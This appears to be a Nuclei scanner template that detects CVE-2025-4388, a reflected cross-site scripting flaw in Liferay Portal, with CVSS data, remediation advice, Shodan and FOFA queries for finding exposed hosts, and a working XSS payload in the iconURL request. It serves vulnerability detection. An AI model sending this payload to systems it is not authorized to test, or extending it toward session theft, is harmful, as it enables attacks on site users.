id: CVE-2025-4388

info:
  name: Liferay Portal - Cross-Site Scripting
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 7.4 GA through update 92 allows a remote non-authenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web.
  impact: |
    Attackers can execute arbitrary JavaScript in victim browsers through the iconURL parameter in the marketplace app manager, potentially leading to session hijacking and credential theft.
  remediation: |
    Upgrade Liferay Portal or DXP to the latest patched version that properly sanitizes the iconURL parameter.
  reference:
    - https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-4388
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-4388
    cwe-id: CWE-79
    epss-score: 0.25059
    epss-percentile: 0.96279
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"liferayPortalCSS"
    fofa-query: body="liferayPortalCSS"
  tags: cve,cve2025,liferay,marketplace,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sticker sticker-'
          - ''
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ad670209df6ea1df7142e45522fa7c0b92010231bdb4e9b5ca45275e21b117830220549608ef5a3971a0592054fbaa23b9faf92708fbc76b3310dd3526065f4bd68d:922c64590222798bb761d5b6d8e72950